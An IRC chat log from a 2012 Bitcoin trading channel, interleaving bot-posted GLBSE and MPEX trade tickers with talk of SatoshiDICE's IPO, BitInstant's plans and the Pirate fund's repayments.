BitInstant is Aug 26 02:55:01 they are different things Aug 26 02:55:18 [08:44:56] the marketing we're doing is business relationships being built with the normal world Aug 26 02:55:29 Thats another problem Aug 26 02:55:32 I wasn't talking about SD Aug 26 02:55:35 Doing a deal with mastercard is insanity Aug 26 02:55:42 insanity? Aug 26 02:55:46 Yup Aug 26 02:55:52 Bitcoin itself is insanity Aug 26 02:55:56 THIS IS SPARTA Aug 26 02:56:00 Yeah okay Aug 26 02:56:13 You'll see what I mean later when it blows up. Aug 26 02:56:24 [GLBSE] [ASICMINER] 5 @ 0.0898 = 0.449 BTC [-] Aug 26 02:56:28 we're building infrastructure that is allowing the normal world economy to start merging into a Bitcoin world Aug 26 02:56:35 This isn't the first time I've seen this siruation repeat itself. Aug 26 02:56:42 It always looks cool until its over Aug 26 02:56:47 we're not asking for your help in doing this, but I'm suprized at the antagonism Aug 26 02:57:04 It's not antagonism, it's a warning :> Aug 26 02:57:15 I bought a lot of shares of your company already Aug 26 02:57:16 but i mean... you ever done deals wirth mastercard usagi ? Aug 26 02:57:18 what's the warning exactly? That normal companies might try to harm Bitcoin? Aug 26 02:57:27 I'm don't think Bitcoin is as weak as you do Aug 26 02:57:43 usagi... you can't regulate bitcoins... Aug 26 02:57:49 [MPEX] [S.MPOE] 20700 @ 0.00039273 = 8.1295 BTC [-] Aug 26 02:58:07 building bridges so people can exchange value BTC <-> Fiat is good. Aug 26 02:58:15 Other bridges? Maybe not so. Aug 26 02:58:15 it's VERY good Aug 26 02:58:20 and it will guarantee BTC success Aug 26 02:58:32 once the bridge is built, the better side of the bridge will be accessable Aug 26 02:58:35 and people will move Aug 26 02:58:40 Make enough people in the real world dependent on Bitcoins Aug 26 02:58:43 they will fight for it Aug 26 02:58:54 Once Politicians are bribed in Bitcoins Aug 26 02:58:56 But bitcoins company might not benefit that much from dealing with regulated markets directly Aug 26 02:59:04 Then that's when things will get really big Aug 26 02:59:14 ya srsly. Aug 26 02:59:20 Only exchanges that want to deal BTC/Fiat get to do that Aug 26 02:59:20 if i were a corrupt politician i'd prefer btc. Aug 26 02:59:28 hehehe Aug 26 02:59:48 i guess the day all whores take btc is the day corrupt politicians ask for btc Aug 26 02:59:58 and in order to get whores on btc you need to get casinos on btc Aug 26 03:00:05 well in any case, inagi, it's good that people have a wide array of opinions on how to "advance" bitcoin Aug 26 03:00:09 thus erik is the key to our political future. Aug 26 03:00:10 it means we'll all try different things Aug 26 03:00:30 there's no monotonous plan that may fail.... but thousands of people working in different directions Aug 26 03:00:37 95% of their plans won't go anywhere Aug 26 03:00:47 but 5% will, and the system will grow and grow Aug 26 03:01:04 [MPEX] [S.DICE] 1000 @ 0.0034 = 3.4 BTC [+] Aug 26 03:01:12 ;;later tell leotreasure http://www.bitbin.it/1MjtTyqg Aug 26 03:01:15 The operation succeeded. Aug 26 03:01:32 Heh Aug 26 03:02:05 sorry I called you inagi lol Aug 26 03:02:15 been drinking here with some other bitcoiners Aug 26 03:02:16 round 2 has begun Aug 26 03:02:29 :D Aug 26 03:02:34 ding ding Aug 26 03:02:36 Had all 2 million from round 1 sold? Aug 26 03:02:40 yeah. Aug 26 03:02:40 yup Aug 26 03:02:41 You need to be careful because some of these companies will do a deal with you with the intent to take you out Aug 26 03:02:48 here with bearbones and benabuya Aug 26 03:03:01 http://albacontrols.files.wordpress.com/2010/08/round2.png Aug 26 03:03:13 tell bearbones 20 btc is cheap! Aug 26 03:03:16 usagi - yes maybe Aug 26 03:03:21 we're ready for battle Aug 26 03:03:42 lol Aug 26 03:03:45 hehe Aug 26 03:03:49 sgornick do !ticker s.dice Aug 26 03:03:50 it used to be Aug 26 03:03:51 mircea... what the fuck... Aug 26 03:04:12 ? Aug 26 03:04:25 that pic Aug 26 03:04:38 im sorry, did i accidentally email everyone everyone's email ? Aug 26 03:05:22 [MPEX] [S.MPOE] 9600 @ 0.00039273 = 3.7702 BTC [-] Aug 26 03:05:25 moneyisdebt - your name is wrong :) Aug 26 03:05:30 [MPEX] [S.BVPS] 350 @ 0.00344946 = 1.2073 BTC [+] Aug 26 03:05:32 [MPEX] [S.BVPS] 68 @ 0.0034631 = 0.2355 BTC [+] Aug 26 03:05:33 debtismoney Aug 26 03:05:33 [MPEX] [S.BVPS] 443 @ 0.00352451 = 1.5614 BTC [+] Aug 26 03:05:34 [MPEX] [S.BVPS] 339 @ 0.00375 = 1.2713 BTC [+] Aug 26 03:05:35 !ticker s.dice Aug 26 03:05:36 [MPEX:S.DICE] 1day: 0.0032 / 0.00320032 / 0.0034 (608044 shares, 1,945.94 BTC), 30day: 0.0032 / 0.00320174 / 0.0034 (2001000 shares, 6,406.70 BTC) Aug 26 03:05:57 evoorhees: Your name is... uhm... Aug 26 03:05:59 Any way I can do !ticker in a PM w/ gribble to get that? Aug 26 03:06:00 No, those legs seems disproportionate with the rest of her body. That's some huge thights. Aug 26 03:06:13 ... I give up Aug 26 03:06:17 :) Aug 26 03:06:30 BTC-Mining i think it's the camera angle Aug 26 03:06:38 Maybe Aug 26 03:06:40 evoorhees: Could a price of say $1000 a Bitcoin do damage to your IPO? Aug 26 03:06:43 sgornick it's assbot not gribble and i dont think it does pms yet Aug 26 03:07:00 evoorhees: What are you IPOing? Aug 26 03:07:04 John - ehh depends how you mean Aug 26 03:07:09 SatoshiDICE Aug 26 03:07:18 evoorhees: Will people bet less and less as the price goes up? Aug 26 03:07:33 [GLBSE] [GSDPT] 5100 @ 0.0034 = 17.34 BTC [+] Aug 26 03:07:35 MoneyIsDebt dutch ? Aug 26 03:07:35 a world where btc is $1000 each is a world where the bitcoin economy is booming, tons of money flowing around Aug 26 03:07:46 we'd be worth like 10bn omg. Aug 26 03:07:56 if SD maintained a leading position in the market, it'd be making FAR higher dollar amounts, but not necessarily higher BTC amounts Aug 26 03:07:57 i'd have to list more stuff ... Aug 26 03:08:04 mircea_popescu: Not enough of a comeback Aug 26 03:08:19 [GLBSE] [GSDPT] 18 @ 0.0034 = 0.0612 BTC [+] Aug 26 03:08:24 .tr evoorhees Aug 26 03:08:25 mircea_popescu: "evoorhees" (nl to en, translate.google.com) Aug 26 03:08:28 .tr voorhees Aug 26 03:08:28 mircea_popescu: "voorhees" (en to en, translate.google.com) Aug 26 03:08:32 .tr voor hees Aug 26 03:08:32 mircea_popescu: "voorhees" (nl to en, translate.google.com) Aug 26 03:08:35 pff Aug 26 03:08:49 yeah it's dutch Aug 26 03:08:51 I think it means foreskin Aug 26 03:08:56 lawl Aug 26 03:08:58 heh Aug 26 03:09:00 dingledongle Aug 26 03:09:00 ;) Aug 26 03:09:02 ticolensic Aug 26 03:09:14 John - thus far, when price rose from the $5's to the $10s and higher, SD volume actually grew nominally in BTC Aug 26 03:09:29 this might be a fluke, but at least thus far, the rising price has not lowered the amount of BTC bet Aug 26 03:09:40 evoorhees your volume grew no matter what. if there was an ipo it grew, when btc went up it grew, it's a sickness. Aug 26 03:09:43 I hope it doesn't mean foreskin Aug 26 03:09:46 I wonder with the new design... Aug 26 03:09:53 when does it gets launched by the way? Aug 26 03:09:56 the new design is cool :) Aug 26 03:10:08 it is dynamic - the stats and figures will update in real time as it's played Aug 26 03:10:09 After all shares are sold? Aug 26 03:10:16 it will be kinda fun to just watch the page Aug 26 03:10:34 new site will be launched in first half of september Aug 26 03:10:51 design is done (html/css etc) Aug 26 03:11:30 it really is tempting to double-spend SD sometimes Aug 26 03:11:31 evoorhees one ideea might be to introduce themed days. sorta like google Aug 26 03:11:35 have a 4th a july one, etc Aug 26 03:12:05 will ponder that mircea :) Aug 26 03:14:47 mircea_popescu: Just like you do with mpex site :D Aug 26 03:15:15 Today's MPEx theme is.... Aug 26 03:15:20 Text Aug 26 03:15:24 :) Aug 26 03:15:38 there's a little css Aug 26 03:15:47 a float:right or somethign Aug 26 03:16:08 MoneyIsDebt lols Aug 26 03:16:13 i had unicorn day! Aug 26 03:16:14 on 4th july it's float:free Aug 26 03:16:47 abnd i had cute dragon day! Aug 26 03:16:50 they were the same day... Aug 26 03:29:28 [GLBSE] [PUREMINING] 15 @ 0.0691 = 1.0365 BTC [-] Aug 26 03:31:33 [GLBSE] [PPT.A] 10 @ 1 = 10 BTC [-] Aug 26 03:31:35 [GLBSE] [PPT.A] 21 @ 1.0399 = 21.8379 BTC [+] Aug 26 03:31:36 [GLBSE] [PPT.A] 37 @ 1.04 = 38.48 BTC [+] Aug 26 03:31:37 [GLBSE] [PPT.A] 4 @ 1.1 = 4.4 BTC [+] Aug 26 03:32:41 [GLBSE] [PPT.B] 100 @ 1.08 = 108 BTC [+] Aug 26 03:33:02 BUY BUY BUY Aug 26 03:33:04 PPT is only 0.32 BTC insured... Aug 26 03:33:14 I think some people are confused... Aug 26 03:33:58 [GLBSE] [GSDPT] 1500 @ 0.0034 = 5.1 BTC [+] Aug 26 03:34:45 [GLBSE] [GSDPT] 175 @ 0.0034 = 0.595 BTC [+] Aug 26 03:35:50 [GLBSE] [GSDPT] 5 @ 0.0034 = 0.017 BTC [+] Aug 26 03:36:07 [GLBSE] [GSDPT] 2 @ 0.0034 = 0.0068 BTC [+] Aug 26 03:36:27 BTC-Mining o really ?! Aug 26 03:36:34 count me as one of those people Aug 26 03:38:02 =/ Aug 26 03:50:49 [GLBSE] [PUREMINING] 10 @ 0.069 = 0.69 BTC [-] Aug 26 03:50:51 [GLBSE] [PUREMINING] 15 @ 0.06558 = 0.9837 BTC [-] Aug 26 03:50:52 [GLBSE] [PUREMINING] 8 @ 0.0652 = 0.5216 BTC [-] Aug 26 03:50:59 yeah why is that selling over 1? Aug 26 03:51:34 idk Aug 26 03:53:52 [GLBSE] [TEEK.USD] 6 @ 0.07 = 0.42 BTC [-] Aug 26 03:56:42 [GLBSE] [ASICMINER] 1 @ 0.0898 BTC [-] Aug 26 03:59:25 [GLBSE] [PUREMINING] 42 @ 0.065 = 2.73 BTC [-] Aug 26 03:59:27 [GLBSE] [PUREMINING] 50 @ 0.062 = 3.1 BTC [-] Aug 26 04:00:03 [MPEX] [S.DICE] 44 @ 0.0034 = 0.1496 BTC [+] Aug 26 04:04:42 [GLBSE] [PUREMINING] 1 @ 0.0001 BTC [-] Aug 26 04:05:08 [MPEX] [F.GIGA.ETF] 9600 @ 0.00102266 = 9.8175 BTC [-] Aug 26 04:05:09 [MPEX] [F.GIGA.ETF] 4771 @ 0.00102564 = 4.8933 BTC [+] Aug 26 04:07:14 [GLBSE] [PUREMINING] 1 @ 0.0001 BTC [-] << 0,0 Aug 26 04:07:27 meni rosenfeld ran off with teh asics ?! Aug 26 04:08:14 . Aug 26 04:08:21 what? Aug 26 04:08:33 [MPEX] [S.DICE] 500 @ 0.0034 = 1.7 BTC [+] Aug 26 04:11:12 ?? Aug 26 04:12:02 [GLBSE] [ASICMINER] 1 @ 0.0898 BTC [-] Aug 26 04:13:30 [GLBSE] [PUREMINING] 43 @ 0.0109 = 0.4687 BTC [+] Aug 26 04:15:08 sold for 0.0001 ? Aug 26 04:15:15 crazy Aug 26 04:15:24 wasn't it supposed to be like 0.1 or so ? Aug 26 04:17:32 [GLBSE] [TYGRR.BOND-PI] 93 @ 1 = 93 BTC [+] Aug 26 04:17:52 [GLBSE] [PUREMINING] 1 @ 0.0099 BTC [-] Aug 26 04:17:54 [GLBSE] [PUREMINING] 1 @ 0.01 BTC [+] Aug 26 04:17:54 [GLBSE] [PUREMINING] 4 @ 0.011 = 0.044 BTC [+] Aug 26 04:17:55 [GLBSE] [PUREMINING] 10 @ 0.012 = 0.12 BTC [+] Aug 26 04:20:13 [GLBSE] [PUREMINING] 3 @ 0.0109 = 0.0327 BTC [-] Aug 26 04:21:44 [GLBSE] [PUREMINING] 2 @ 0.013 = 0.026 BTC [+] Aug 26 04:22:52 [GLBSE] [PUREMINING] 2 @ 0.031 = 0.062 BTC [+] Aug 26 04:23:24 What's up with puremining? There was already orders for over 0.0001 Aug 26 04:23:52 [GLBSE] [ASICMINER] 10 @ 0.0898 = 0.898 BTC [-] Aug 26 04:24:08 The 0.0001 shouldn't have been sold in =/ Aug 26 04:24:38 [GLBSE] [PUREMINING] 1 @ 0.021 BTC [-] Aug 26 04:25:19 [MPEX] [S.MPOE] 16490 @ 0.00039332 = 6.4858 BTC [+] Aug 26 04:25:20 [MPEX] [S.MPOE] 26410 @ 0.00039332 = 10.3876 BTC [+] Aug 26 04:29:49 [GLBSE] [ASICMINER] 6 @ 0.0898 = 0.5388 BTC [-] Aug 26 04:30:52 [MPEX] [S.MPOE] 1200 @ 0.00039273 = 0.4713 BTC [-] Aug 26 04:30:53 [MPEX] [S.MPOE] 26500 @ 0.00039238 = 10.3981 BTC [-] Aug 26 04:31:36 [GLBSE] [PUREMINING] 1 @ 0.029 BTC [+] Aug 26 04:32:20 [GLBSE] [PUREMINING] 5 @ 0.0506 = 0.253 BTC [+] Aug 26 04:32:38 [GLBSE] [PUREMINING] 1 @ 0.031 BTC [-] Aug 26 04:33:18 [GLBSE] [OBSI.HRPT] 1 @ 0.10699999 BTC [+] Aug 26 04:33:29 [GLBSE] [PUREMINING] 1 @ 0.047 BTC [+] Aug 26 04:34:02 [GLBSE] [PUREMINING] 13 @ 0.0506 = 0.6578 BTC [+] Aug 26 04:34:29 [GLBSE] [PUREMINING] 1 @ 0.051 BTC [+] Aug 26 04:36:24 [MPEX] [S.MPOE] 3381 @ 0.00039238 = 1.3266 BTC [-] Aug 26 04:36:26 [MPEX] [S.MPOE] 2919 @ 0.00039168 = 1.1433 BTC [-] Aug 26 04:37:21 [MPEX] [S.MPOE] 38044 @ 0.00039168 = 14.9011 BTC [-] Aug 26 04:37:22 [MPEX] [S.MPOE] 8456 @ 0.00039051 = 3.3022 BTC [-] Aug 26 04:37:46 BTC-Mining odd Aug 26 04:37:55 maybe those orders died cause lack of funds ? Aug 26 04:38:12 No, They're still there Aug 26 04:38:23 I even had an order over it which wasn't filled Aug 26 04:40:23 [MPEX] [S.MPOE] 200 @ 0.00039095 = 0.0782 BTC [+] Aug 26 04:40:25 [MPEX] [S.MPOE] 7926 @ 0.00039051 = 3.0952 BTC [-] Aug 26 04:41:33 [GLBSE] [PUREMINING] 1 @ 0.055 BTC [+] Aug 26 04:41:34 [GLBSE] [PUREMINING] 2 @ 0.0599 = 0.1198 BTC [+] Aug 26 04:42:57 [MPEX] [F.GIGA.ETF] 239 @ 0.00102564 = 0.2451 BTC [+] Aug 26 04:42:59 [MPEX] [F.GIGA.ETF] 6000 @ 0.00102632 = 6.1579 BTC [+] Aug 26 04:48:49 [GLBSE] [TYGRR.BOND-P] 2 @ 0.3403 = 0.6806 BTC [-] Aug 26 04:48:51 [GLBSE] [TYGRR.BOND-P] 15 @ 0.3402 = 5.103 BTC [-] Aug 26 04:49:00 [GLBSE] [FOO.PPPPT] 1 @ 0.34 BTC [-] Aug 26 04:50:07 [GLBSE] [TYGRR.BOND-P] 6 @ 0.34 = 2.04 BTC [-] Aug 26 04:50:34 [GLBSE] [FOO.PPPPT] 15 @ 0.33502 = 5.0253 BTC [-] Aug 26 04:51:34 [GLBSE] [PPT.B] 100 @ 1.04 = 104 BTC [-] Aug 26 04:51:35 [GLBSE] [BIB.PIRATE] 2 @ 0.3403 = 0.6806 BTC [-] Aug 26 04:52:10 [GLBSE] [BIB.PIRATE] 15 @ 0.3402 = 5.103 BTC [-] Aug 26 04:52:35 [GLBSE] [TYGRR.BOND-P] 10 @ 0.33 = 3.3 BTC [-] Aug 26 04:52:42 BTC-Mining now that's really problematic. Aug 26 04:53:07 [GLBSE] [TYGRR.BOND-P] 10 @ 0.32 = 3.2 BTC [-] Aug 26 04:53:52 [GLBSE] [BIB.PIRATE] 23 @ 0.34 = 7.82 BTC [-] Aug 26 04:54:25 [GLBSE] [TYGRR.BOND-P] 6 @ 0.31 = 1.86 BTC [-] Aug 26 04:55:04 [GLBSE] [BIB.PIRATE] 15 @ 0.338 = 5.07 BTC [-] Aug 26 04:56:28 0,3 nao ? Aug 26 04:56:31 ;;ticker Aug 26 04:56:32 Best bid: 10.5336, Best ask: 10.618, Bid-ask spread: 0.08440, Last trade: 10.53572, 24 hour volume: 37252, 24 hour low: 10.2, 24 hour high: 10.6188 Aug 26 04:57:27 [GLBSE] [BIB.PIRATE] 2 @ 0.3381 = 0.6762 BTC [+] Aug 26 05:00:15 [MPEX] [O.BTCUSD.P090N] 2 @ 0.13805703 = 0.2761 BTC [+] Aug 26 05:03:28 [GLBSE] [RAREEARTH] 5 @ 0.0095 = 0.0475 BTC [-] Aug 26 05:06:50 mircea_popescu: you should use lower units for your btc deposits :< Aug 26 05:07:04 I have 39.3 B and just tried to deposit 39, but it wants me to deposit 39.95 to identify haha Aug 26 05:07:22 awww! Aug 26 05:07:34 i guess should put a leading zero there one of these days Aug 26 05:07:43 indeed Aug 26 05:07:44 preferably before btc goes over 100usd Aug 26 05:07:58 guess I'll have to deposit 38 lol Aug 26 05:13:46 [GLBSE] [V.HRL] 1 @ 1 BTC Aug 26 05:14:53 [GLBSE] [FPGAMINING] 1 @ 0.8999 BTC [+] Aug 26 05:15:49 [GLBSE] [OBSI.HRPT] 1 @ 0.10699999 BTC [+] Aug 26 05:16:11 [GLBSE] [PUREMINING] 1 @ 0.066 BTC [+] Aug 26 05:16:12 [GLBSE] [PUREMINING] 1 @ 0.069 BTC [+] Aug 26 05:16:14 [GLBSE] [PUREMINING] 2 @ 0.0732 = 0.1464 BTC [+] Aug 26 05:16:15 [GLBSE] [PUREMINING] 1 @ 0.089 BTC [+] Aug 26 05:16:16 [GLBSE] [PUREMINING] 1 @ 0.09 BTC [+] Aug 26 05:16:52 Diablo-D3: I made you a present because I was bored, https://dl.dropbox.com/u/3832397/Photos/2012/August/2012-08-26-031510.jpg Aug 26 05:18:28 lol Aug 26 05:19:00 mircea_popescu: diablo loves Ubuntu :D Aug 26 05:21:25 [MPEX] [S.DICE] 11465 @ 0.0034 = 38.981 BTC [+] Aug 26 05:22:42 Satoshi Dice has the potential to rule the Bitcoin world if it hoards enough coins. Aug 26 05:22:54 It's a zero-sum casino game after all. Aug 26 05:23:03 So after thinking this through Aug 26 05:23:08 I am withdrawing my sell order Aug 26 05:24:20 Evoorhees/investors will probably sell those coins... Aug 26 05:24:36 actually the fact that it's available for sale to the public eliminates that. Aug 26 05:24:45 the money it makes goes back into the ecosystem Aug 26 05:25:30 Guys Aug 26 05:25:35 It's only 10% of the company. Aug 26 05:25:39 Actually less Aug 26 05:25:57 Evoorhees doesn't sell Bitcoins Aug 26 05:26:04 this is the first time i've geard "only 10%" in the process of this ipo Aug 26 05:26:29 neither does Luke-Jr sell bitcoins. is his pool gonna take over btc too ? Aug 26 05:26:32 [MPEX] [S.MPOE] 1657 @ 0.00039051 = 0.6471 BTC [-] Aug 26 05:26:32 [MPEX] [S.MPOE] 43400 @ 0.00039023 = 16.936 BTC [-] Aug 26 05:26:34 [MPEX] [S.MPOE] 14527 @ 0.00038918 = 5.6536 BTC [-] Aug 26 05:26:37 His pool is very small. Aug 26 05:26:47 Satoshi Dice on the other hand is very profitable. Aug 26 05:28:31 wait. you had a sell order ? **** BEGIN LOGGING AT Sun Aug 26 13:29:43 2012 Aug 26 13:30:00 !ticker s.dice Aug 26 13:30:01 [MPEX:S.DICE] 1day: 0.0032 / 0.00320692 / 0.0034 (404547 shares, 1,297.35 BTC), 30day: 0.0032 / 0.00320303 / 0.0034 (2014009 shares, 6,450.93 BTC) Aug 26 13:30:52 [MPEX] [S.MPOE] 37186 @ 0.00038402 = 14.2802 BTC [+] Aug 26 13:30:53 [MPEX] [S.MPOE] 11814 @ 0.00038513 = 4.5499 BTC [+] Aug 26 13:32:47 ok so if anyone wants a laugh : Aug 26 13:32:49 http://www.bvb.ro/TradingAndStatistics/TranzactCurent.aspx?ty=1&mg=0 Aug 26 13:32:54 this is the romanian stock exchange. Aug 26 13:33:14 on it, 6 companies did more volume than S.DICE Aug 26 13:33:23 .py 6450.93 * 10.520 * 3.58199 Aug 26 13:33:24 243087.394217 Aug 26 13:33:30 as in, ~250k ron. Aug 26 13:34:19 [GLBSE] [ASICMINER] 1 @ 0.0897 BTC [-] Aug 26 13:34:21 [GLBSE] [ASICMINER] 15 @ 0.08961 = 1.3442 BTC [-] Aug 26 13:34:22 [GLBSE] [ASICMINER] 39 @ 0.0896 = 3.4944 BTC [-] Aug 26 13:34:37 [GLBSE] [CIUCIU.BOND] 50 @ 0.09999999 = 5 BTC [+] Aug 26 13:35:01 volume by money or volume by shres? Aug 26 13:35:16 money. Aug 26 13:35:31 [GLBSE] [ASICMINER] 30 @ 0.089799 = 2.694 BTC [+] Aug 26 13:35:35 daily volume or ipo volume? Aug 26 13:35:56 well ipo volume happened yest. Aug 26 13:37:28 [GLBSE] [ASICMINER] 57 @ 0.089799 = 5.1185 BTC [+] Aug 26 13:38:11 Impressive Aug 26 13:39:10 i mean there's fucken IMF delegations going to see the govt of romania, aite ? Aug 26 13:39:20 eu member and all that. Aug 26 13:40:12 NYAN news: https://bitcointalk.org/index.php?topic=97178.msg1133894#msg1133894 Aug 26 13:40:47 [GLBSE] [V.HRL] 10 @ 1 = 10 BTC Aug 26 13:41:33 [GLBSE] [OBSI.HRPT] 8 @ 0.10600001 = 0.848 BTC [-] Aug 26 13:41:33 [GLBSE] [OBSI.HRPT] 4 @ 0.106 = 0.424 BTC [-] Aug 26 13:41:35 [GLBSE] [OBSI.HRPT] 1 @ 0.1025 BTC [-] Aug 26 13:41:36 [GLBSE] [OBSI.HRPT] 187 @ 0.1022 = 19.1114 BTC [-] Aug 26 13:43:57 [GLBSE] [OBSI.HRPT] 13 @ 0.1022 = 1.3286 BTC [-] Aug 26 13:43:59 [GLBSE] [OBSI.HRPT] 34 @ 0.1021 = 3.4714 BTC [-] Aug 26 13:44:32 [GLBSE] [GSDPT] 32 @ 0.0034 = 0.1088 BTC [+] Aug 26 13:46:56 [GLBSE] [OBSI.HRPT] 66 @ 0.1021 = 6.7386 BTC [-] Aug 26 13:46:58 [GLBSE] [OBSI.HRPT] 1 @ 0.100111 BTC [-] Aug 26 13:46:58 [GLBSE] [OBSI.HRPT] 1 @ 0.10001 BTC [-] Aug 26 13:50:39 usagi cool. Aug 26 13:50:39 [GLBSE] [PUREMINING] 41 @ 0.09 = 3.69 BTC [+] Aug 26 13:50:51 mircea_popescu: let's hope they're not coming to see you too ;) Aug 26 13:51:19 why not ? i'd lend them some money if they pay good rates. Aug 26 13:51:42 how many bitcoins to buy a greek island these days? Aug 26 13:51:59 :) Aug 26 13:52:07 i wouldn't even buy greek islands. Aug 26 13:52:18 i want to buy 1600s aristocratic privileges. Aug 26 13:52:47 ooh Aug 26 13:52:50 they change all eu constitutions to clearly state that there's a class of people who are immune from common law and extempt from taxation, i give them some money to keep on. Aug 26 13:53:10 j. fugger round 2. Aug 26 13:53:29 I must admit... Europe kicked more ass in feudal times Aug 26 13:53:41 [GLBSE] [MOORE] 1 @ 0.50000002 BTC [+] Aug 26 13:54:07 well at least the arts certainly did better. Aug 26 13:54:16 [GLBSE] [MOORE] 1 @ 0.50000001 BTC [-] Aug 26 13:54:19 and 1600 is post feudal anyway. Aug 26 13:54:49 [GLBSE] [MOORE] 1 @ 0.5 BTC [-] Aug 26 13:54:57 [GLBSE] [GIGAMINING] 1 @ 0.976 BTC [-] Aug 26 13:56:34 and post kicking ass ... start kissing ass instead Aug 26 13:56:56 i think it did ok at the time neh ? Aug 26 13:57:20 yes, it's much more profitable Aug 26 14:02:10 mornin Aug 26 14:03:58 heya Aug 26 14:08:48 o/ kakobrekla mircea_popescu Aug 26 14:08:57 heya mornin Aug 26 14:09:07 hows it going Aug 26 14:09:09 what's good fellas Aug 26 14:09:23 oh, not bad, getting ready for bed :) Aug 26 14:09:25 how bot you? Aug 26 14:09:29 bout* Aug 26 14:09:39 ha, just the opposite, sippin mornin coffee Aug 26 14:09:42 read up, the part where mpex nao does comparably well to the romanian stock exchange Aug 26 14:10:30 url? Aug 26 14:10:33 a one sec Aug 26 14:12:49 [GLBSE] [TYGRR.BOND-A] 1 @ 0.065 BTC [-] Aug 26 14:20:06 dongs. Aug 26 14:20:47 [GLBSE] [JAH] 84 @ 0.16 = 13.44 BTC [-] Aug 26 14:26:11 Thanks for the dividend USagi :) Aug 26 14:26:31 Aye, we're doing our best! Aug 26 14:26:37 [GLBSE] [OBSI.HRPT] 4 @ 0.1089 = 0.4356 BTC [+] Aug 26 14:27:19 DeaDTerra: whats my 1btc worth now =P Aug 26 14:27:34 Looks like we can keep paying 1.3% a week at current prices while slowly expanding Aug 26 14:27:39 (for BMF). Aug 26 14:27:54 1.19 I think :P Aug 26 14:27:55 usagi: remember to buy more DMC Aug 26 14:28:13 it has up to 1.36 Aug 26 14:28:17 There are quite a few things I need to buy Aug 26 14:28:53 1.36? 1.19? well I am going by the published NAV of about .6 Aug 26 14:29:11 usagi: no, I have 1btc invested with DeaDTerra Aug 26 14:29:17 it seems to have grown Aug 26 14:29:23 [GLBSE] [OBSI.HRPT] 200 @ 0.101 = 20.2 BTC [-] Aug 26 14:29:47 [GLBSE] [YABMC] 2 @ 0.12817 = 0.2563 BTC [-] Aug 26 14:31:24 woah dmc is going up Aug 26 14:31:25 thats neat Aug 26 14:33:14 !ticker DMC Aug 26 14:33:15 [GLBSE:DMC] [Bid: 0.04000001] [Ask: 0.06899999] [Spread: 0.02899998] [Last: 0.05] [24hVol: 20.096799] [7dAvg: 0.05458317] Aug 26 14:33:34 I'm gonna place a couple of bids this week I guess Aug 26 14:36:23 Problem is that DMC is 15% of NYAN.B Aug 26 14:36:25 [GLBSE] [FPGAMINING] 3 @ 0.989 = 2.967 BTC [-] Aug 26 14:36:26 We're overweight DMC Aug 26 14:36:30 Then again it's that good. Aug 26 14:36:35 Actually Aug 26 14:36:39 DMC saved our ass this week Aug 26 14:36:46 do you have a policy of %s ? Aug 26 14:36:53 as in, no more than 5% or w/e in any one asset ? Aug 26 14:36:56 usagi: how? Aug 26 14:36:59 Over 10% causes concern. Aug 26 14:37:25 We have 3% in satoshidice now Aug 26 14:37:33 loldice Aug 26 14:37:34 Because we bought in at 0.111 Aug 26 14:37:35 err Aug 26 14:37:35 seems reasonable. Aug 26 14:37:35 0.01111 Aug 26 14:37:38 and sold some at 0.05 Aug 26 14:37:44 ahaha i like usagi Aug 26 14:37:46 We made 500% on DMC Aug 26 14:37:48 practical mind. Aug 26 14:38:23 We have 5000 shares of DMC and if it goes to 0.1 like it touched 0.1 this week... we'll be happy Aug 26 14:38:46 It's the law of averages. Pirate crashes and somewhere somehow something jumps 100)%. Aug 26 14:38:52 1000% Aug 26 14:38:58 not really comparable volumes tho Aug 26 14:39:34 but anyway. anyone left claiming pirate will pay ? Aug 26 14:40:03 pirate is Aug 26 14:40:21 When did he say that thouh? Aug 26 14:40:35 There's no reliable central news source goat. Aug 26 14:40:36 [GLBSE] [OBSI.HRPT] 69 @ 0.102 = 7.038 BTC [+] Aug 26 14:40:51 [MPEX] [S.DICE] 2941 @ 0.0034 = 9.9994 BTC [+] Aug 26 14:41:12 last word from pirate was he would pay Aug 26 14:41:22 Yeah but what was the timeframe Aug 26 14:41:31 couple of days ago Aug 26 14:41:45 Well it's reasonable Aug 26 14:41:47 !ticker GSDPT Aug 26 14:41:49 I mean 4-5 mil, it's reasonable to wait a cojuple of weeks Aug 26 14:41:49 [GLBSE:GSDPT] [Bid: 0.0032] [Ask: 0.0034] [Spread: 0.0002] [Last: 0.0034] [24hVol: 616.27545] [7dAvg: 0.00392753] Aug 26 14:41:56 usagi why ? Aug 26 14:42:20 Consider YARR. Fully insured, but I can't just dump 2000bitcoins of mining bonds on the market Aug 26 14:42:28 50k usd a day in extra interest Aug 26 14:42:29 It would take me 2-3 weeks to sell out properly Aug 26 14:42:44 But if he's stopping operations there is no profit from continuing operations Aug 26 14:42:58 usagi except he picked his own date. Aug 26 14:43:08 What date was that? Aug 26 14:43:13 i think he paid 11 small accountsd Aug 26 14:43:16 if you decided you close down next month, you'd take the 2-3 weeks to sell out orderly. Aug 26 14:43:20 one of them had 10 btc in it Aug 26 14:43:28 He did apparently pay smaller accounts Aug 26 14:43:36 10 btw wtf Aug 26 14:43:39 btc wtf Aug 26 14:44:01 one guy i know claims he got just over 10 btc from pirate Aug 26 14:44:12 pirate said he paid 11 accounts out under 800 btc Aug 26 14:45:49 he said he has like 30 or 50k personal coins Aug 26 14:46:03 [GLBSE] [YARR] 9 @ 0.997 = 8.973 BTC [-] Aug 26 14:46:04 [GLBSE] [YARR] 7 @ 0.999 = 6.993 BTC [+] Aug 26 14:46:06 being a stand up man, those should go :) Aug 26 14:46:43 I'm going to quote you goat Aug 26 14:47:01 quote me where and why?? Aug 26 14:47:14 pirate said he had 30k coins personal coins Aug 26 14:47:35 usagi maged posted the logs from bitcoin-otc Aug 26 14:47:44 dont quote me quote pirate... Aug 26 14:47:58 if you start quoting me when you can look this up i will stop talking... Aug 26 14:48:07 :D Aug 26 14:48:14 i dont want this bs telephone bs Aug 26 14:48:23 its all on the forum already Aug 26 14:48:26 its not secret Aug 26 14:48:36 i dont want you making it look like i know shit that is not public Aug 26 14:49:19 Thanks for telling me your sources Aug 26 14:49:28 Otherwise I would quote you. Aug 26 14:49:42 Unless you asked me not to, maybe... Aug 26 14:50:02 OOC what forum is that in? Aug 26 14:50:48 bitcointalk.org Aug 26 14:50:56 maged has been quoting pirate from irc Aug 26 14:50:58 he is taking logs Aug 26 14:51:39 the only thing i know that is not public is that one guy who made it public that he had been paid back told me in a message that he was paid back 10ish btc Aug 26 14:51:47 Yeah but what forum on bitcointalk.org :> I'm guessing lending? Aug 26 14:52:06 so that one number is the only thing i know thats not public Aug 26 14:52:08 Yeah someone named greysomething said he got paid back too but didn't want to say for how much Aug 26 14:52:20 ask maged where he but it, i was 